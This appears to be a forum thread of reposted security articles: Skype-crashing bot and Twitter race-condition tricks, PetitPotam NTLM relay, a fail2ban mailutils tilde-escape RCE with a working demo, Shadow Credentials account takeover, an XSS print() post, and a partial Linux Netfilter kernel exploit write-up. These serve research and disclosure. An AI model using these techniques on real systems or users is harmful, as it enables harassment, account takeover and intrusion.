- Make two Skype bots and add them to the chat
- Have one bot repeatedly set the topic to 'lol' (lowercase)
- Have the other bot repeatedly set the topic to 'LOL' (uppercase)

For example, bot #1 repeatedly sends "/topic lololol" to the chat and bot #2 repeatedly sends "/topic LOLOLOL". If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access Skype via the web (web.skype.com) to leave the group, and then reinstall Skype.

Twitter API TOC/TOU Race Condition 0day:

There was a race condition bug affecting Twitter's API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests to Twitter concurrently, it is possible to delete other people's likes/retweets/followers.
You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RTs from the same tweet from the same third-party account, once again making a request to Twitter's API in order to do so. As a result of the race condition, this removes multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ retweets down to 16 retweets in a matter of minutes. The Proof-of-Concept code for this will be viewable within the "Exploits and Code Examples" section of the upcoming site of 0xFFFF, where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team.

That's all for now; part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications.

Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
  6. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains

July 26, 2021  Ravie Lakshmanan

A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, into authenticating with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain.

The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol, which is used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network."

Specifically, the attack enables a domain controller to authenticate against a remote NTLM relay under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication.

"An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain."
While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack," which permits attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services.

"To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where the Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks."

To safeguard against this line of attack, the Windows maker is recommending that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company is urging users to take one of the two steps below:

- Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic.
- Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services.

PetitPotam marks the third major Windows security issue disclosed over the past month, after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities.

Sursa: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
  7. fail2ban – Remote Code Execution

JAKUB ŻOCZEK | July 26, 2021 | Research

This article is about the recently published security advisory for a pretty popular piece of software – fail2ban (CVE-2021-32749). The vulnerability could be massively exploited and lead to root-level code execution on multiple boxes; however, this is rather hard for a regular person to achieve. It all has its roots in the mailutils package, and I found it by total accident when playing with the mail command.

fail2ban analyses logs (or other data sources) in search of brute-force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions which can be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet to find out how to send an e-mail from the command line, you will often get this solution:

$ echo "test e-mail" | mail -s "subject" user@example.org

That is exactly how one of fail2ban's actions is configured to send e-mails about a client getting blocked (./config/action.d/mail-whois.conf):

actionban = printf %%b "Hi,\n
            The IP <ip> has just been banned by Fail2Ban after
            <failures> attempts against <name>.\n\n
            Here is more information about <ip> :\n
            `%(_whois_command)s`\n
            Regards,\n
            Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest>

There is nothing suspicious about the above, until you know about one specific thing that can be found inside the mailutils manual. It is the tilde escape sequences:

The '~!' escape executes the specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The '~|' escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced.
If the command produced no output, mail assumes that something went wrong and retains the old contents of your message.

This is the way it works in real life:

jz@fail2ban:~$ cat -n pwn.txt
     1  Next line will execute command
     2  ~! uname -a
     3
     4  Best,
     5  JZ
jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com
Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
jz@fail2ban:~$

If you go back to the previously mentioned fail2ban e-mail action, you can notice there is whois output attached to the e-mail body. So if we could add some tilde escape sequence to the whois output for our IP address – well, it should end up with code execution. As root.

What are our options? As attackers we need to control the whois output – how do we achieve that? Well, the first thing that came to my mind was to kindly ask my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately, it doesn't work like that. RIPE/ARIN/APNIC and the others put in entries for whole IP classes as a minimum, not for one particular IP address. Also, I'm more than sure that achieving this formally is extremely hard, plus the fact that putting a malicious payload in a whois entry would make people ask questions.

Is there a way to run my own whois server? Surprisingly, there is, and you can find a couple of them running over the Internet. By digging through the whois-related RFC you can find information about an attribute called ReferralServer. If your whois client finds such an attribute in the response, it will query the server set in its value to get more information about the IP address or domain.
Just take a look at what happens when getting whois for the 157.5.7.5 IP address:

$ whois 157.5.7.5

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2021, American Registry for Internet Numbers, Ltd.
#

NetRange:       157.1.0.0 - 157.14.255.255
CIDR:           157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14
NetName:        APNIC-ERX-157-1-0-0
NetHandle:      NET-157-1-0-0-1
Parent:         NET157 (NET-157-0-0-0-0)
NetType:        Early Registrations, Transferred to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)
[… cut …]
ReferralServer:  whois://whois.apnic.net
ResourceLink:  http://wq.apnic.net/whois-search/static/search.html

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
[… cut …]

Found a referral to whois.apnic.net.

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '157.0.0.0 - 157.255.255.255'

% Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net'

inetnum:        157.0.0.0 - 157.255.255.255
netname:        ERX-NETBLOCK
descr:          Early registration addresses
[… cut …]

In theory, if you had a pretty big network, you could probably ask your Regional Internet Registry to use RWhois for it. On the other hand, simply imagine black hats breaking into a server running rwhois, putting a malicious entry there and then starting the attack. To be fair, this scenario seems way easier than becoming a big company in order to legally have your own whois server.
In case you’re a government and you can simply control network traffic – the task is way easier. Taking a closer look at the whois protocol, we can notice a few things:

- it was designed a really long time ago,
- it's pretty simple (you ask for an IP or domain name and get raw output),
- it's unencrypted at the network level.

By simply performing a MITM attack on an unencrypted protocol (which whois is), attackers could just insert the tilde escape sequence and start an attack across multiple hosts.

It's worth remembering that the root problem here is mailutils, which has this flaw by design. I believe a lot of people are unaware of such a feature, and there's still plenty of software that could use the mail command this way. As has been seen many times in history – security is hard and complex. Sometimes a totally innocent functionality which you would never suspect of being a threat can be the cause of a dangerous vulnerability.

Author: Jakub Żoczek

Sursa: https://research.securitum.com/fail2ban-remote-code-execution/
  8. Key-Checker

Go scripts for checking API key / access token validity

Update V1.0.0 🚀

Added 37 checkers!

Screenshot 📷

How to Install

go get github.com/daffainfo/Key-Checker

Reference 📚

https://github.com/streaak/keyhacks

Sursa: https://github.com/daffainfo/Key-Checker
  9. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover

Elad Shamir

The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings:

- Resetting a user's password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE).
- Roasting is time-consuming and depends on the target having a weak password, which may not be the case.
- RBCD is hard to follow because someone (me) failed to write a clear and concise post about it.
- RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved.

The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover.

Tl;dr

It is possible to add "Key Credentials" to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post.
Previous Work

When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael's code to a new C# tool called Whisker to be used via implants on operations. More on that below.

What is PKINIT?

In Kerberos authentication, clients must perform "pre-authentication" before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client's password and try to crack it offline, as done in the AS-REP Roasting attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks.

The symmetric key (secret key) approach, which is the one most widely used and known, uses a symmetric key derived from the client's password, AKA the secret key. If using RC4 encryption, this key would be the NT hash of the client's password. The KDC has a copy of the client's secret key and can decrypt the pre-authentication data to authenticate the client.
The KDC uses the same key to encrypt a session key sent to the client along with the TGT.

PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair and encrypts the pre-authentication data with their private key, and the KDC decrypts it with the client's public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods:

Diffie-Hellman Key Delivery

Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client's or the KDC's private key, (almost) providing Perfect Forward Secrecy. I say almost because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account.

Public Key Encryption Key Delivery

Public Key Encryption Key Delivery uses the KDC's private key and the client's public key to envelop a session key generated by the KDC.

Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with: the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication. PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default.

No PKI? No Problem!

Microsoft also introduced the concept of Key Trust, to support passwordless authentication in environments that don't support Certificate Trust.
Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client's public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials: serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account can have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange.

This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user.

Windows Hello for Business Provisioning and Authentication

Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user's account; the private key should never leave the TPM. Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment's certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key.
Under the Key Trust model, the Domain Controller can decrypt the client's pre-authentication data using the raw public key in the corresponding NGC object stored in the client's msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client's certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term "client" rather than "user" here because this mechanism applies to both users and computers.

What About NTLM?

PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself.

When I first read the title of the RFC for this mechanism, I thought to myself, "Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true". And it was: the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user's session key rather than their secret key. That presented another challenge for the U2U design: every time a client authenticates and obtains a TGT, a new session key is generated.
Also, the KDC does not maintain a repository of active session keys; it extracts the session key from the client's ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user's TGT as an "additional ticket". The KDC will extract the session key from the TGT's encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash.

This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user.

As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release.

Abuse

When abusing Key Trust, we are effectively adding alternative credentials to the account, or "Shadow Credentials", allowing us to obtain a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials persist even if the user/computer changes their password. Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options:

- Forge an RC4 silver ticket to impersonate privileged users to the corresponding host.
- Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name.

Key Trust abuse has the added benefit that it doesn't delegate access to another account which could get compromised; it is restricted to the private key generated by the attacker.
In addition, it doesn't require creating a computer account that may be hard to clean up until privilege escalation is achieved.

Whisker

Alongside this post I am releasing a tool called "Whisker". Based on code from Michael's DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. Whisker has four functions:

Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled in WHfB from a new device.
List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Remove — This function removes a key credential from the target object, specified by a DeviceID GUID.
Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break.

Requirements

This technique requires the following:

At least one Windows Server 2016 Domain Controller.
A digital certificate for Server Authentication installed on the Domain Controller.
Windows Server 2016 functional level in Active Directory.
A compromised account with delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
Detection

There are two main opportunities for detecting this technique:

If PKINIT authentication is not common in the environment or not common for the target account, the "Kerberos authentication ticket (TGT) was requested" event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.

If a SACL is configured to audit Active Directory object modifications for the targeted account, the "Directory service object was modified" event (5136) can indicate anomalous behavior if the subject changing msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which typically act as the Key Provisioning Server and legitimately modify this attribute for users.

Prevention

It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn't be able to reset the passwords of members of the Domain Admins group, less secure or less "trustworthy" users with lower privileges should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the msDS-KeyCredentialLink attribute of any account not meant to be enrolled in Key Trust passwordless authentication, particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can be detected with a suitable SACL.

Conclusion

Abusing Key Trust account mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller at the matching functional level.
References

Whisker by Elad Shamir (@elad_shamir)
Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter)
DSInternals by Michael Grafnetter (@MGrafnetter)

Source: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
  10. Eviatar Gerzi, Security Researcher, CyberArk

Attackers are increasingly targeting Kubernetes clusters to compromise applications or abuse resources for things like crypto-coin mining. Through live demos, this research-based session will show attendees how. Eviatar Gerzi, who researches DevOps security, will also introduce an open source tool designed to help blue and red teams discover and eliminate risky permissions.

Pre-Requisites: Basic experience with Kubernetes and familiarity with Docker containers.
  11. Dr. Ruby, I think, is better at other things than medicine. Here is her LinkedIn profile; she is NOT a medical doctor: https://www.linkedin.com/in/dr-jane-ruby-49971411/

Well, actually, she is a doctor: a doctor of psychology. The video also mentions a doctor, a HOMEOPATHIC doctor (they forgot to mention that part). And that guy puts out articles like this every day. At least look at the comments on Facebook; some of them are pertinent. Welcome to the Internet, where anything anyone says is true.
  12. alert() is dead, long live print()

James Kettle, Director of Research @albinowax
Published: 02 July 2021 at 13:27 UTC
Updated: 05 July 2021 at 10:03 UTC

Cross-Site Scripting and the alert() function have gone hand in hand for decades. Want to prove you can execute arbitrary JavaScript? Pop an alert. Want to find an XSS vulnerability the lazy way? Inject alert()-invoking payloads everywhere and see if anything pops up.

However, there's trouble brewing on the horizon. Malicious adverts have been abusing our beloved alert to distract and social engineer visitors from inside their iframes. Google Chrome has decided to tackle this by disabling alert for cross-domain iframes. Cross-domain iframes are often built into websites deliberately, and are also a near-essential component of certain relatively advanced XSS attacks. Once Chrome 92 lands on 20th July 2021, XSS vulnerabilities inside cross-domain iframes will:

No longer enable alert-based PoCs.
Be invisible to anyone using alert-based detection techniques.

What next?

The obvious workaround is to use prompt or confirm, but unfortunately Chrome's mitigation blocks all dialogs. Triggering a DNS pingback to a listener, OAST-style, is another potential approach, but it is less suitable as a PoC due to the configuration requirements. We also ruled out console.log(), as console functions are often proxied or disabled by JavaScript obfuscators.

It's quite funny that this "protection" against showing dialogs cross-domain blocks alerts and prompts, but as Yosuke Hasegawa pointed out, they forgot about basic authentication. This works in the current version of Canary. It's likely to be blocked in future though.

We needed an alert-alternative that was:

Simple, setup-free and easy to remember
Highly visible, even when executed in an invisible iframe

After weeks of intensive research, we're thrilled to bring you... print()

We will be updating our Web Security Academy labs to support print()-based solutions shortly.
The XSS cheat sheet will also be updated to reflect the new print() payloads for use with cross-domain iframes. We'll keep using alert when there are no iframes involved... for now. Long live print!

- Gareth & James

Source: https://portswigger.net/research/alert-is-dead-long-live-print
  13. CVE-2021-22555: Turning \x00\x00 into 10000$

Andy Nguyen (theflow@) - Information Security Engineer

CVE-2021-22555 is a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter that is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break the Kubernetes pod isolation of the kCTF cluster and won $10,000 for charity (where Google will match and double the donation to $20,000).

Table of Contents

Introduction
Vulnerability
Exploitation
  Exploring struct msg_msg
  Achieving use-after-free
  Bypassing SMAP
  Achieving a better use-after-free
  Finding a victim object
  Bypassing KASLR/SMEP
  Escalating privileges
  Kernel ROP chain
  Escaping the container and popping a root shell
Proof-Of-Concept
Timeline
Thanks

Introduction

After BleedingTooth, which was the first time I looked into Linux, I wanted to find a privilege escalation vulnerability as well. I started by looking at old vulnerabilities like CVE-2016-3134 and CVE-2016-4997, which inspired me to grep for memcpy() and memset() in the Netfilter code. This led me to some buggy code.

Vulnerability

When IPT_SO_SET_REPLACE or IP6T_SO_SET_REPLACE is called in compatibility mode, which requires the CAP_NET_ADMIN capability (which can however be obtained in a user+network namespace), structures need to be converted from user to kernel representation, as well as from 32-bit to 64-bit, in order to be processed by the native functions. Naturally, this is destined to be error prone.
Our vulnerability is in xt_compat_target_from_user(), where memset() is called with an offset target->targetsize that is not accounted for during the allocation, leading to a few bytes written out-of-bounds:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
				unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;
	char name[sizeof(t->u.user.name)];

	t = *dstptr;
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);

	tsize += off;
	t->u.user.target_size = tsize;
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;
}

The targetsize is not controllable by the user, but one can choose different targets with different structure sizes by name (like TCPMSS, TTL or NFQUEUE). The bigger targetsize is, the more we can vary the offset. Though, the target size must not be 8-byte aligned in order to fulfill pad > 0.
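The pad > 0 condition can be checked with a quick sketch of the XT_ALIGN arithmetic (Python is used here purely for the arithmetic; XT_ALIGN rounds up to an 8-byte boundary as in the kernel macro):

```python
# Sketch of the XT_ALIGN padding arithmetic that drives the OOB memset().
def xt_align(size: int) -> int:
    # Mirrors the kernel's XT_ALIGN: round up to an 8-byte boundary.
    return (size + 7) & ~7

# pad is the number of zero bytes memset() writes past targetsize.
for targetsize in (0x48, 0x4A, 0x4C, 0x50):
    pad = xt_align(targetsize) - targetsize
    print(hex(targetsize), pad)
# Only non-8-byte-aligned sizes (e.g. 0x4A, 0x4C) yield pad > 0.
```

For a targetsize of 0x4C, the value used by the NFLOG target below, this gives four zero bytes written out-of-bounds.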
The biggest possible target I found is NFLOG, for which we can choose an offset up to 0x4C bytes out-of-bounds (one can influence the offset by adding padding between struct xt_entry_match and struct xt_entry_target):

struct xt_nflog_info {
	/* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
	__u32 len;
	__u16 group;
	__u16 threshold;
	__u16 flags;
	__u16 pad;
	char  prefix[64];
};

Note that the destination of the buffer is allocated with GFP_KERNEL_ACCOUNT and can also vary in size:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
	struct xt_table_info *info = NULL;
	size_t sz = sizeof(*info) + size;

	if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
		return NULL;

	info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
	if (!info)
		return NULL;

	memset(info, 0, sizeof(*info));
	info->size = size;
	return info;
}

Though, the minimum size is > 0x100, which means the smallest slab this object can be allocated in is kmalloc-512. In other words, we have to find victims which are allocated between kmalloc-512 and kmalloc-8192 to exploit.

Exploitation

Our primitive is limited to writing four bytes of zero up to 0x4C bytes out-of-bounds. With such a primitive, usual targets are:

Reference counter: Unfortunately, I could not find any suitable objects with a reference counter in the first 0x4C bytes.

Free list pointer: CVE-2016-6187: Exploiting Linux kernel heap off-by-one is a good example of how to exploit the free list pointer. However, that was already 5 years ago, and meanwhile kernels have the CONFIG_SLAB_FREELIST_HARDENED option enabled, which among other things protects free list pointers.

Pointer in a struct: This is the most promising approach; however, four bytes of zero is too much to write. For example, a pointer 0xffff91a49cb7f000 could only be turned into 0xffff91a400000000 or 0x9cb7f000, both of which would likely be invalid pointers.
On the other hand, if we used the primitive to write at the very beginning of the adjacent block, we could write fewer bytes, e.g. 2 bytes, and for example turn a pointer from 0xffff91a49cb7f000 into 0xffff91a49cb70000.

Playing around with some victim objects, I noticed that I could never reliably allocate them around struct xt_table_info on kernel 5.4. I realized that it had something to do with the GFP_KERNEL_ACCOUNT flag, as other objects allocated with GFP_KERNEL_ACCOUNT did not have this issue. Jann Horn confirmed that before 5.9, separate slabs were used to implement accounting. Therefore, every heap primitive we use in the exploit chain should also use GFP_KERNEL_ACCOUNT.

The syscall msgsnd() is a well-known primitive for heap spraying (which uses GFP_KERNEL_ACCOUNT) and has been utilized in multiple public exploits already. Though, its structure msg_msg has surprisingly never been abused. In this write-up, we will demonstrate how this data structure can be abused to gain a use-after-free primitive, which in turn can be used to leak addresses and fake other objects. Coincidentally, in parallel to my research in March 2021, Alexander Popov also explored the very same structure in Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel.
Exploring struct msg_msg

When sending data with msgsnd(), the payload is split into multiple segments:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG);
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
	if (msg == NULL)
		return NULL;

	msg->next = NULL;
	msg->security = NULL;

	len -= alen;
	pseg = &msg->next;
	while (len > 0) {
		struct msg_msgseg *seg;

		cond_resched();

		alen = min(len, DATALEN_SEG);
		seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
		if (seg == NULL)
			goto out_err;
		*pseg = seg;
		seg->next = NULL;
		pseg = &seg->next;
		len -= alen;
	}

	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

where the headers for struct msg_msg and struct msg_msgseg are:

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h
struct list_head {
	struct list_head *next, *prev;
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

The first member in struct msg_msg is the mlist.next pointer, which points to another message in the queue (this is different from next, which points to the next segment). This is a perfect candidate to corrupt, as you will learn next.

Achieving use-after-free

First, we initialize a lot of message queues (in our case 4096) using msgget().
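For reference, the kmalloc sizes that msgsnd() payloads map to can be sketched as follows (the header sizes are assumptions for a typical x86-64 build: 48 bytes for struct msg_msg, 8 for struct msg_msgseg, matching the layouts above):

```python
# Sketch: how alloc_msg() splits a payload into a head allocation plus segments.
MSG_HDR = 48                   # assumed sizeof(struct msg_msg) on x86-64
SEG_HDR = 8                    # assumed sizeof(struct msg_msgseg)
PAGE = 4096
DATALEN_MSG = PAGE - MSG_HDR   # data that fits in the first allocation
DATALEN_SEG = PAGE - SEG_HDR   # data per follow-up segment

def allocations(payload_len: int) -> list:
    """Return the kmalloc request sizes for a msgsnd() payload of payload_len bytes."""
    head = min(payload_len, DATALEN_MSG)
    sizes = [MSG_HDR + head]
    payload_len -= head
    while payload_len > 0:
        alen = min(payload_len, DATALEN_SEG)
        sizes.append(SEG_HDR + alen)
        payload_len -= alen
    return sizes

# A "message of size 4096 including the struct msg_msg header" is a single
# kmalloc-4096 allocation; the 1024-byte secondary message fits kmalloc-1024.
print(allocations(DATALEN_MSG))       # [4096]
print(allocations(1024 - MSG_HDR))    # [1024]
```

This is why the primary and secondary messages below land in the kmalloc-4096 and kmalloc-1024 slabs respectively.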
